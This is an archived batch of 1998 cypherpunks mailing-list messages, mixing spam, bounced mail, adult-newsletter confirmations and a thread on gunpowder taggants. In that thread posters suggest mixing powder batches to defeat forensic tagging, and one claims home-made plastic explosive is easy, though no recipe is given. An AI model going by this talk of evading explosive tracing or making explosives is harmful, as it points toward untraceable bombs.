From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vanessa_107@mailexcite.com
Date: Fri, 15 May 1998 12:54:05 -0700 (PDT)
To: vanessa_107@mailexcite.com
Subject: Free Access to the Best Adult Site!!!
Message-ID: <199805154002DAA51087@post.finmin.lt>
MIME-Version: 1.0
Content-Type: text/plain



Come to a site that you'll never get tired of with:
 FREE...Over THOUSANDS of Live Hardcore Sex Channels from Hustler!!!!
 FREE...LIVE 1-on-1 Video Sex with AUDIO!!! Just tell her what you want to see and she'll do it!!!!
 FREE...THOUSANDS of Pictures in our Galleries from American Blondes to Asian Beautys!!!! You name it we got it!!!
 FREE...XXX Games, & so much more!!!

What are you waiting for its free!!!! 

http://209.203.84.3
 click here! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 33606886@compuserve.com
Date: Fri, 15 May 1998 22:16:31 -0700 (PDT)
To: 112032.306@compuserve.com
Subject: No Subject
Message-ID: <458734865234.GBB21218@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



   
                   LET'S ALL CELEBRATE SEINFELD!


   Friends, every so often that rare show comes along that captures 
the essence and feeling of the decade. The 70's had 'All In The 
Family'. The 80's had 'Cheers'. And the 90's gave us... 'Seinfeld'!

   Well, we're certainly going to miss Jerry, George, Kramer and 
Elaine, but we can *still* hang on to a little bit of them: To 
celebrate this classic show, we are proud to offer a very rare 
and very funny collection of never-before-seen outtakes and 
footage of Jerry and the gang!

   Some of these clips will definitely surprise you!


   This video comes in VHS format and is a full 81 minutes in length.


Why not visit our site at:

http://www.seinfeld-salute.com/thatsashame.htm

<A HREF="http://www.seinfeld-salute.com/thatsashame.htm">
http://www.seinfeld-salute.com/thatsashame.htm</A>


..or

http://205.152.190.230/thatsashame.htm



(*** These are NOT the same outtakes that were shown just before the 
final episode! ***)




Please note: This is a one-time mailing. You have already been placed on
             our remove list.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 92640856@bellsouth.net
Date: Sat, 16 May 1998 07:22:55 -0700 (PDT)
To: 123458@qqeioweisssiiie.com
Subject: Ball Caps for Father's Day
Message-ID: <199234233019.GAA08423@qqeioweisssiiie.com>
MIME-Version: 1.0
Content-Type: text/plain


You procrastinated over Mothers Day so don't wait for Father's Day to get here
and not have anything for him.

Father's Day Hat's with worlds greatest father on them. 100% cotton, white,
super adjustable, fit's large sizes. Great for all summer in the hot sun, on
the golf course or any outside activity. Visit our Web page and see the hat at
<A HREF="http://members.aol.com/WePrintAny/index.html">WePrintAny's Home Page
</A>  Another spot is here http://members.aol.com/WePrintAny/index.html

Visit the web page then return here, this is your order Page.  Order now
before we're over booked.  Orders are already comming in.

1 hat is $10.00
2 hats for $18.00
This includes postage and handling (USA only).
Send cash, check or Money Order (sorry no credit cards) to:

GDH
P.O. Box 2092
Orange Park, Fl. 32067-2092

No checks after 1 June 1998.  Not enough time for check to clear and hat to be
mailed and received by Fathers Day.

Print this page, this is your order form.
Include your e-mail address________________________________
In case we need to contact you.

This is your mailing Label.

From
WePrint Any
P.O. Box 2092
Orange Park, Fl 32067

                     Name_______________________________________
                     Add._______________________________________
                     City__________________State_____ Zip_______

Don't wait, order now.  Cash and Money Orders mailed the same day.

Order:
1 Hat  $10.00                 $10.00
__ add. Hat's  $8.00           _____
Fl. residents add 7% tax       _____

TOTAL                         $_____

Check back after Fathers Day for full Product line.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Sat, 16 May 1998 11:48:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Gunpowder taggant solution
Message-ID: <9805161844.AA05715@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor said:
> I think that the gunpowder taggants are not as bad as it seems at first
> sight. EVen if all gunpowders are sold with taggants, and if there is
> enough people wishing to defeat them, they can simply organize gunpowder
> mixing parties at gun shows. After several such parties, the taggants
> might become completely useless.

I'm woefully ignorant about reloading, but would this really work?
Would you mix your high-quality smokeless with Tim's homebrew black
powder, Toto's pebble-ground Canada Red Doobie Mix, and Bell's
stinkbomb components and take away the average?  Or are different types
of powder visually distinct enough or similar enough in effect to mix
and match effectively?

	Jim Gillogly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 16 May 1998 11:04:13 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Gunpowder taggant solution
Message-ID: <199805161802.NAA21718@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


I think that the gunpowder taggants are not as bad as it seems at first
sight. EVen if all gunpowders are sold with taggants, and if there is
enough people wishing to defeat them, they can simply organize gunpowder
mixing parties at gun shows. After several such parties, the taggants
might become completely useless.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 16 May 1998 12:56:19 -0700 (PDT)
To: jim@mentat.com (Jim Gillogly)
Subject: Re: Gunpowder taggant solution
In-Reply-To: <9805161844.AA05715@mentat.com>
Message-ID: <199805161952.OAA22508@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jim Gillogly wrote:
> Igor said:
> > I think that the gunpowder taggants are not as bad as it seems at first
> > sight. EVen if all gunpowders are sold with taggants, and if there is
> > enough people wishing to defeat them, they can simply organize gunpowder
> > mixing parties at gun shows. After several such parties, the taggants
> > might become completely useless.
> 
> I'm woefully ignorant about reloading, but would this really work?
> Would you mix your high-quality smokeless with Tim's homebrew black
> powder, Toto's pebble-ground Canada Red Doobie Mix, and Bell's
> stinkbomb components and take away the average?  Or are different types
> of powder visually distinct enough or similar enough in effect to mix
> and match effectively?

I am perhaps even more ignorant, but I think that if you mix the same
kind of gunpowder (XYZ's BLAH # 123 gunpowder for example), then there
is no problem. But of course mixing different kinds may be asking for
trouble -- I have no clue about that.

Also, a gun owner could simply buy gnu powder in various places and
mix the batches.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 May 1998 13:20:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Idaho v. Horiuchi
Message-ID: <199805162020.QAA26245@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We offer the U.S. District Court's decision in Idaho v. Horiuchi 
to dismiss state charges against the FBI sniper/killer of Vicki 
Weaver.

   http://jya.com/id-lth.htm

Grim reading of succinct description of the killing and gun
battle, and how the feds carefully protect their own from 
harm for punishing those foolish to challenge national might. 

The judge wisely notes his decision does not preclude
the possibility that other, federal, charges may be brought 
against Horiuchi and his supervisors. Some chance.

These are HTML conversions of scanned images from the 
Idaho District Court's impressive Web page at:

   http://www.id.uscourts.gov

All the documents filed in the case are online.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 May 1998 14:16:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Gunpowder taggant solution
In-Reply-To: <9805161844.AA05715@mentat.com>
Message-ID: <199805162116.RAA14343@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


ATF published on May 1 its annual "1998 List of Explosive
Materials" subject to regulation under 18 U.S.C. Chapter 40,
Importation, Manufacture, Distribution and Storage of Explosive 
Materials:

   http://jya.com/atf050i98.txt

This list of ingredients might be used to mis-tag home 
mixes -- or ID the mixers' traces on implements.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 May 1998 14:35:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Gunpowder taggant solution
In-Reply-To: <199805161952.OAA22508@manifold.algebra.com>
Message-ID: <199805162134.RAA13996@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Correct URL for the ATF list of explosive materials is:

   http://jya.com/atf050198.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 16 May 1998 20:57:55 -0700 (PDT)
To: jim@mentat.com (Jim Gillogly)
Subject: Re: Gunpowder taggant solution
In-Reply-To: <9805161844.AA05715@mentat.com>
Message-ID: <v0313030bb1840e9b6ddc@[209.133.20.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 PM -0700 5/16/98, Igor Chudov @ home wrote:
>Jim Gillogly wrote:
>> Igor said:
>> > I think that the gunpowder taggants are not as bad as it seems at first
>> > sight. EVen if all gunpowders are sold with taggants, and if there is
>> > enough people wishing to defeat them, they can simply organize gunpowder
>> > mixing parties at gun shows. After several such parties, the taggants
>> > might become completely useless.
>>
>> I'm woefully ignorant about reloading, but would this really work?
>> Would you mix your high-quality smokeless with Tim's homebrew black
>> powder, Toto's pebble-ground Canada Red Doobie Mix, and Bell's
>> stinkbomb components and take away the average?  Or are different types
>> of powder visually distinct enough or similar enough in effect to mix
>> and match effectively?
>
>I am perhaps even more ignorant, but I think that if you mix the same
>kind of gunpowder (XYZ's BLAH # 123 gunpowder for example), then there
>is no problem. But of course mixing different kinds may be asking for
>trouble -- I have no clue about that.
>
>Also, a gun owner could simply buy gnu powder in various places and
>mix the batches.

I don't know the particular details of the "taggant" proposal (in terms of
which problem it's trying to solve). But here are some generally true
comments:

* For smokeless powders, i.e., _not_ black powder, the powders are
semi-visually recognizable. So Bullseye is noticeably different from Unique
and 2400, for example.

* However, smokeless powders are worthless for bombs. (Black powder is
almost worthless, by modern standards. Much easier to make your own
plastique.)

* If the goal  is to trace shootings, as oppose to bombings, then the focus
would be on smokeless powders. However, very few Bad Guys are into
reloading, so....

* The only way such a law can be useful is to crack down strongly on
ammunition resales, loans, gifts, etc. And a monstrous nightmare of
traceability, identity checks, etc.

(And what to do with those of us who have several cases (1000 rounds/case)
of various kinds of ammo? (I surmise dimbulbs like Diane Feinstein, Sarah
Brady, and Barbara Boxer think they can "outlaw" this old ammo, or cause a
gang banger in LA to shoot only freshly-purchased ammo.)

And so it goes.

--Tim May


"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 17 May 1998 01:06:15 -0700 (PDT)
To: jim@mentat.com (Jim Gillogly)
Subject: Re: Gunpowder taggant solution
In-Reply-To: <9805161844.AA05715@mentat.com>
Message-ID: <3.0.5.32.19980516224219.008b7510@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:52 PM 5/16/98 -0500, Igor Chudov @ home wrote:
>> I'm woefully ignorant about reloading, but would this really work?
>> Would you mix your high-quality smokeless with Tim's homebrew black
>> powder, Toto's pebble-ground Canada Red Doobie Mix, 

	... and Bill's Delaware Punch black powder.
...
>Also, a gun owner could simply buy gnu powder in various places and
>mix the batches.

Is "gnu powder" available from the Free Explosives Foundation?


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 16 May 1998 21:32:15 -0700 (PDT)
To: tcmay@got.net (Tim May)
Subject: Re: Gunpowder taggant solution
In-Reply-To: <v0313030bb1840e9b6ddc@[209.133.20.46]>
Message-ID: <199805170431.XAA01850@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Tim May wrote:
> * For smokeless powders, i.e., _not_ black powder, the powders are
> semi-visually recognizable. So Bullseye is noticeably different from Unique
> and 2400, for example.

Is mixing them dangerous?

> * However, smokeless powders are worthless for bombs. (Black powder is
> almost worthless, by modern standards. Much easier to make your own
> plastique.)

I thought that plastic explosives were hard to make. Is that wrong?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 17 May 1998 07:22:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: More Tools for ILEA
Message-ID: <199805171422.KAA23491@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT, May 17, 1998, on the Birmingham Summit:

G8 leaders spent considerable time discussing arrangements
for international cooperation in fighting cross-border crimes 
like money-laundering, computer fraud and arms smuggling.

In a communique, the leaders endrosed efforts to negotiate
a United Nations agreement to provide law enforcement
officials with more tools to fight international organized
crime.

They called for talks with the business community on an
international legal framework for obtaining computer data
as evidence in criminal cases, while preserving privacy
protections.

-----

A pointer to the communique or other G8 reports from this
session would be welcomed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@www.video-collage.com>
Date: Sun, 17 May 1998 14:40:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Returned mail: User unknown
Message-ID: <199805172139.RAB15707@www.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Sun, 17 May 1998 17:39:44 -0400 (EDT)
from uucp@localhost

   ----- The following addresses had permanent fatal errors -----
eureka-sc.895438334.pldjlkahcagchhlcjjic-cypherpunks=toad.com@eureka.abc-web.com

   ----- Transcript of session follows -----
... while talking to eureka.abc-web.com.:
>>> RCPT To:<eureka-sc.895438334.pldjlkahcagchhlcjjic-cypherpunks=toad.com@eureka.abc-web.com>
<<< 553 sorry, your envelope sender is in my badmailfrom list (#5.7.1)
550 eureka-sc.895438334.pldjlkahcagchhlcjjic-cypherpunks=toad.com@eureka.abc-web.com... User unknown


Reporting-MTA: dns; www.video-collage.com
Arrival-Date: Sun, 17 May 1998 17:39:44 -0400 (EDT)

Final-Recipient: RFC822; eureka-sc.895438334.pldjlkahcagchhlcjjic-cypherpunks=toad.com@eureka.abc-web.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; eureka.abc-web.com
Diagnostic-Code: SMTP; 553 sorry, your envelope sender is in my badmailfrom list (#5.7.1)
Last-Attempt-Date: Sun, 17 May 1998 17:39:45 -0400 (EDT)


To: eureka-sc.895438334.pldjlkahcagchhlcjjic-cypherpunks=toad.com@eureka.abc-web.com
Subject: Now we need your reply! (fwd)bc-web.com
From: cypherpunks@toad.Com
Date: Sun, 17 May 1998 16:36:27 -0500 (CDT)

eureka-help@eureka.abc-web.com wrote:
> From owner-cypherpunks@Algebra.Com  Sun May 17 16:24:16 1998
> Mailing-List: contact eureka-help@eureka.abc-web.com; run by ezmlm
> Date: 17 May 1998 20:52:14 -0000
> Message-ID: <895438334.21977.ezmlm@eureka.abc-web.com>
> From: eureka-help@eureka.abc-web.com
> To: cypherpunks@toad.com
> Reply-To: eureka-sc.895438334.pldjlkahcagchhlcjjic-cypherpunks=toad.com@eureka.abc-web.com
> Delivered-To: responder for eureka@eureka.abc-web.com
> Subject: Now we need your reply!
> Sender: owner-cypherpunks@Algebra.Com
> Precedence: bulk
> X-Mailing-List: cypherpunks@algebra.com
> X-List-Admin: ichudov@algebra.com
> X-Loop: cypherpunks@algebra.com
> 
> 
> We  have  received a  subscription  request  for the Eureka!
> Adult  Newsletter  to be  sent to  your  email  address.  To
> confirm this request,  please use the Reply function on your
> email program to send this email back to us.
> 
> If you do  not reply  to this email we will  assume you have
> changed your mind, or may have been the victim of a 'prank'.
> If you did not  enter your email address  at one of our web-
> sites then somebody else has done so for you. If you  do not
> wish to  receive the  newsletters just ignore this email. Or
> you can click below to  have your email  address permanently
> blocked  from ever  receiving  any of  our future  mailings.
> Block me -----> http://eureka.abc-web.com/eureka/blockme.htm
> 
> - The Eureka! Adult Newsletter Team.
> 
> 
> The following lines identify the source of this subscription
> request,  including date/time,  IP number and  browser used.
> 
> HEADER1=13:52 Pacific Time Sunday May 17 1998
> HEADER2=199.203.203.194 Mozilla/3.0Gold (Win95; I)
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 17 May 1998 18:00:26 -0700 (PDT)
To: shamrock@cypherpunks.to (Lucky Green)
Subject: Re: Gunpowder taggant solution
In-Reply-To: <Pine.BSF.3.96.980518031710.20829B-100000@pakastelohi.cypherpunks.to>
Message-ID: <199805180056.TAA00480@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Lucky Green wrote:
> > I thought that plastic explosives were hard to make. Is that wrong?
> 
> Making plastic explosives is easy. No, I am not going to post the recipe.

If _I_ knew the recipe, I would have posted it, at least anonymously.

I respect you a lot, Lucky, but in this case you are behaving like
an asshole.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka-help@eureka.abc-web.com
Date: Sun, 17 May 1998 13:52:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Now we need your reply!
Message-ID: <895438334.21977.ezmlm@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


We  have  received a  subscription  request  for the Eureka!
Adult  Newsletter  to be  sent to  your  email  address.  To
confirm this request,  please use the Reply function on your
email program to send this email back to us.

If you do  not reply  to this email we will  assume you have
changed your mind, or may have been the victim of a 'prank'.
If you did not  enter your email address  at one of our web-
sites then somebody else has done so for you. If you  do not
wish to  receive the  newsletters just ignore this email. Or
you can click below to  have your email  address permanently
blocked  from ever  receiving  any of  our future  mailings.
Block me -----> http://eureka.abc-web.com/eureka/blockme.htm

- The Eureka! Adult Newsletter Team.


The following lines identify the source of this subscription
request,  including date/time,  IP number and  browser used.

HEADER1=13:52 Pacific Time Sunday May 17 1998
HEADER2=199.203.203.194 Mozilla/3.0Gold (Win95; I)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C" <pleontks@hotmail.com>
Date: Sun, 17 May 1998 23:11:23 -0700 (PDT)
To: Yankee1428@aol.com
Subject: Newsletter
Message-ID: <19980518061036.7570.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm getting ready to put out another newsletter.  But I can only do it 
with ya'll's help.  if possible, could everyone send me an article or 
anything at all for the newsletter?

Thanks

John
pleontks@hotmail.com
http://members.tripod.com/~pleontks

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@netcom.com>
Date: Sun, 17 May 1998 23:59:02 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199805180658.XAA18423@netcomsv.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The original message was received at Sun, 17 May 1998 23:58:55 -0700 (PDT)
from pax-ca11-11.ix.netcom.com [204.30.66.171]

   ----- The following addresses had permanent fatal errors -----
<eureka-help@eureka.abc-web.com>

   ----- Transcript of session follows -----
... while talking to eureka.abc-web.com.:
>>> RCPT To:<eureka-help@eureka.abc-web.com>
<<< 553 sorry, your envelope sender is in my badmailfrom list (#5.7.1)
550 <eureka-help@eureka.abc-web.com>... User unknown

   ----- Original message follows -----

Return-Path: <cypherpunks@toad.com>
Received: from ca07b8bl (pax-ca11-11.ix.netcom.com [204.30.66.171])
	by netcomsv.netcom.com (8.8.5-r-beta/8.8.5/(NETCOM v1.01)) with SMTP id XAA18419;
	Sun, 17 May 1998 23:58:55 -0700 (PDT)
Message-Id: <3.0.5.32.19980517235334.008e0210@popd.ix.netcom.com>
X-Sender: stewarts@popd.ix.netcom.com
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Sun, 17 May 1998 23:53:34 -0700
To: eureka-help@eureka.abc-web.com, abuse@abc-web.com
From: Bill Stewart <cypherpunks@toad.com>
Subject: unsubscribe
In-Reply-To: <895458516.7940.ezmlm@eureka.abc-web.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

unsubscribe
end
cypherpunks is a list with several hundred subscribers.
Some spammer has been trying to subscribe the list
to your service.  Earlier today I connected to the
web site and found that somebody else had
permanently removed most of the list aliases,
but you seem to be sending out this announcement anyway.

At 02:28 AM 5/18/98 -0000, you wrote:
>WELCOME TO EUREKA!
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>Congratulations,  your free subscription to the Eureka!
>newsletter is now set up. We hope you enjoy every copy.
>As promised,  while you wait  for your first newsletter
>here are the links to  the FREE videos and FREE photos!
>
>BIENVENUE =C0 EUREKA!
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>F=E9licitations,  votre abonnement  libre =E0  l'Eureka! le
>bulletin  est  maintenant install=E9.  Nous esp=E9rons  que
>vous  appr=E9ciez chaque copie.  Comme promis,  alors que
>vous attendez votre premier bulletin ici sont les liens
>aux videos LIBRES et aux photos LIBRES!
>
>WILLKOMMEN ZU EUREKA!
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>Gl=FCckw=FCnsche,   Ihre  freie  Subskription  zum  Eureka!
>Rundschreiben wird jetzt oben eingestellt.  Wir hoffen,
>da=DF Sie jedes  Exemplar genie=DFen.  Wie, w=E4hrend Sie Ihr
>erstes Rundschreiben hier warten, sind die Links zu den
>FREIEN videos und zu den FREIEN Fotos versprochen!=20
>
>RECEPCI=D3N A EUREKA!
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>Felicitaciones,  su  suscripci=F3n  libre  al  Eureka! el
>bolet=EDn  de   noticias  ahora  se  fija   para  arriba.
>Esperamos  que  usted  goce  de  cada  copia.  Seg=FAn lo
>prometido,  mientras que usted espera su primer bolet=EDn
>de noticias aqu=ED son las conexiones a los videos LIBRES
>y a las fotos LIBRES!
>
>BENVENUTO A EUREKA!
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>Congratulazioni,   il  vostro  abbonamento   libero  al
>Eureka!  il bollettino  ora =E8 installato.  Speriamo che
>godiate ogni copia.  Come promesso, mentre aspettate il
>vostro primo bollettino qui sono i collegamenti ai vid-
>eos LIBERI ed alle foto LIBERE!
>
>BOA VINDA A EUREKA!
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>Felicita=E7=F5es, sua subscri=E7=E3o livre ao Eureka! o boletim
>de not=EDcias =E9 ajustado  agora acima.  N=F3s esperamos que
>voc=EA aprec=EDe cada c=F3pia.  Como prometidas,  quando voc=EA
>esperar seu  primeiro boletim  de not=EDcias aqui  s=E3o as
>liga=E7=F5es aos videos LIVRES e =E0s fotos LIVRES!
>
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D
>FREE hardcore videos ........ http://www.slutorama.com/
>FREE hardcore photos .... http://209.50.232.36/desires/
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D
>
>The following lines identify the source of this subscription
>request,  including date/time,  IP number and  browser used.
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Nixon" <rob@www.usachat.com>
Date: Mon, 18 May 1998 00:04:52 -0700 (PDT)
To: "Bill Stewart" <cypherpunks@toad.com>
Subject: Re: unsubscribe
Message-ID: <003501bd822a$89a26300$d3add9cf@webchat.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Please give me the exact address to block - we already blocked all we know
of yours.

- Robin.

-----Original Message-----
From: Bill Stewart <cypherpunks@toad.com>
To: eureka-help@eureka.abc-web.com <eureka-help@eureka.abc-web.com>;
abuse@abc-web.com <abuse@abc-web.com>
Date: Monday, May 18, 1998 12:05 AM
Subject: unsubscribe


>unsubscribe
>end
>cypherpunks is a list with several hundred subscribers.
>Some spammer has been trying to subscribe the list
>to your service.  Earlier today I connected to the
>web site and found that somebody else had
>permanently removed most of the list aliases,
>but you seem to be sending out this announcement anyway.
>
>At 02:28 AM 5/18/98 -0000, you wrote:
>>WELCOME TO EUREKA!
>>==================
>>Congratulations,  your free subscription to the Eureka!
>>newsletter is now set up. We hope you enjoy every copy.
>>As promised,  while you wait  for your first newsletter
>>here are the links to  the FREE videos and FREE photos!
>>
>>BIENVENUE  EUREKA!
>>===================
>>Flicitations,  votre abonnement  libre   l'Eureka! le
>>bulletin  est  maintenant install.  Nous esprons  que
>>vous  apprciez chaque copie.  Comme promis,  alors que
>>vous attendez votre premier bulletin ici sont les liens
>>aux videos LIBRES et aux photos LIBRES!
>>
>>WILLKOMMEN ZU EUREKA!
>>=====================
>>Glckwnsche,   Ihre  freie  Subskription  zum  Eureka!
>>Rundschreiben wird jetzt oben eingestellt.  Wir hoffen,
>>da Sie jedes  Exemplar genieen.  Wie, whrend Sie Ihr
>>erstes Rundschreiben hier warten, sind die Links zu den
>>FREIEN videos und zu den FREIEN Fotos versprochen!
>>
>>RECEPCIN A EUREKA!
>>===================
>>Felicitaciones,  su  suscripcin  libre  al  Eureka! el
>>boletn  de   noticias  ahora  se  fija   para  arriba.
>>Esperamos  que  usted  goce  de  cada  copia.  Segn lo
>>prometido,  mientras que usted espera su primer boletn
>>de noticias aqu son las conexiones a los videos LIBRES
>>y a las fotos LIBRES!
>>
>>BENVENUTO A EUREKA!
>>===================
>>Congratulazioni,   il  vostro  abbonamento   libero  al
>>Eureka!  il bollettino  ora  installato.  Speriamo che
>>godiate ogni copia.  Come promesso, mentre aspettate il
>>vostro primo bollettino qui sono i collegamenti ai vid-
>>eos LIBERI ed alle foto LIBERE!
>>
>>BOA VINDA A EUREKA!
>>===================
>>Felicitaes, sua subscrio livre ao Eureka! o boletim
>>de notcias  ajustado  agora acima.  Ns esperamos que
>>voc aprece cada cpia.  Como prometidas,  quando voc
>>esperar seu  primeiro boletim  de notcias aqui  so as
>>ligaes aos videos LIVRES e s fotos LIVRES!
>>
>>=======================================================
>>FREE hardcore videos ........ http://www.slutorama.com/
>>FREE hardcore photos .... http://209.50.232.36/desires/
>>=======================================================
>>
>>The following lines identify the source of this subscription
>>request,  including date/time,  IP number and  browser used.
>>
>>
>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka-help@eureka.abc-web.com
Date: Sun, 17 May 1998 19:28:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Successful Subscription
Message-ID: <895458516.7940.ezmlm@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


WELCOME TO EUREKA!
==================
Congratulations,  your free subscription to the Eureka!
newsletter is now set up. We hope you enjoy every copy.
As promised,  while you wait  for your first newsletter
here are the links to  the FREE videos and FREE photos!

BIENVENUE  EUREKA!
===================
Flicitations,  votre abonnement  libre   l'Eureka! le
bulletin  est  maintenant install.  Nous esprons  que
vous  apprciez chaque copie.  Comme promis,  alors que
vous attendez votre premier bulletin ici sont les liens
aux videos LIBRES et aux photos LIBRES!

WILLKOMMEN ZU EUREKA!
=====================
Glckwnsche,   Ihre  freie  Subskription  zum  Eureka!
Rundschreiben wird jetzt oben eingestellt.  Wir hoffen,
da Sie jedes  Exemplar genieen.  Wie, whrend Sie Ihr
erstes Rundschreiben hier warten, sind die Links zu den
FREIEN videos und zu den FREIEN Fotos versprochen! 

RECEPCIN A EUREKA!
===================
Felicitaciones,  su  suscripcin  libre  al  Eureka! el
boletn  de   noticias  ahora  se  fija   para  arriba.
Esperamos  que  usted  goce  de  cada  copia.  Segn lo
prometido,  mientras que usted espera su primer boletn
de noticias aqu son las conexiones a los videos LIBRES
y a las fotos LIBRES!

BENVENUTO A EUREKA!
===================
Congratulazioni,   il  vostro  abbonamento   libero  al
Eureka!  il bollettino  ora  installato.  Speriamo che
godiate ogni copia.  Come promesso, mentre aspettate il
vostro primo bollettino qui sono i collegamenti ai vid-
eos LIBERI ed alle foto LIBERE!

BOA VINDA A EUREKA!
===================
Felicitaes, sua subscrio livre ao Eureka! o boletim
de notcias  ajustado  agora acima.  Ns esperamos que
voc aprece cada cpia.  Como prometidas,  quando voc
esperar seu  primeiro boletim  de notcias aqui  so as
ligaes aos videos LIVRES e s fotos LIVRES!

=======================================================
FREE hardcore videos ........ http://www.slutorama.com/
FREE hardcore photos .... http://209.50.232.36/desires/
=======================================================

The following lines identify the source of this subscription
request,  including date/time,  IP number and  browser used.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka-help@eureka.abc-web.com
Date: Sun, 17 May 1998 20:02:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Successful Subscription
Message-ID: <895460543.21135.ezmlm@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


WELCOME TO EUREKA!
==================
Congratulations,  your free subscription to the Eureka!
newsletter is now set up. We hope you enjoy every copy.
As promised,  while you wait  for your first newsletter
here are the links to  the FREE videos and FREE photos!

BIENVENUE  EUREKA!
===================
